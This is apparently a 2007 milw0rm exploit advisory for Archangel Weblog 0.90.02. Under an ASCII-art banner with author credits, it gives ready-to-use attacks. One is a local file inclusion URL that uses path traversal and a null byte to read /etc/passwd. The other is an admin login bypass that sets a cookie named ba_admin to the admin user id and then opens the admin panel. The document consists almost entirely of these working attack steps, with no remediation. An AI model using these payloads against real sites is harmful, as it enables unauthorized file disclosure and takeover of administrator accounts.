1 \\\|///
2 \\ − − //
3 ( @ @ )
4 −−−−oOOo−−(_)−oOOo−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
5 Portal : Archangel Weblog version 0.90.02
6
Home : http://www.archangelmgt.com/weblog.shtml
7 Download : http://www.archangelmgt.com/Archangel_Weblog_v090_02.zip
8
Author : Dj7xpl / Dj7xpl@2600.ir
9
HomePage : http://Dj7xpl.2600.ir
10
Type : Local File Inclusion & Login Page Bypass By Cookie
11 −−−−ooooO−−−−−Ooooo−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
12 ( ) ( )
13 \ ( ) /
14 \_) (_/
15
16
17
18 +−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−+
19
20 Local File Include :
21
22 http://[TARGET]/[PATH]/index.php?index=[Local File]%00
23 http://Target.com/blog/index.php?index=../../../../etc/passwd%00
24
25 +−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−+
26
27
28 +−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−+
29
30 Edit Cookie :
31
32 Host : Target
33 Name : ba_admin
34 Value : 1 <−−−−−− (Admin User Id)
35
36 And Go To Admin Panel :
37
38 http://[Target]/[Path]/Admin/
39
40 +−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−+
41
42 # milw0rm.com [2007−05−05]
Page 1/1
Archangel Weblog 0.90.02 Local File Inclusion Admin Bypass Vulns
Dj7xpl
05/05/2007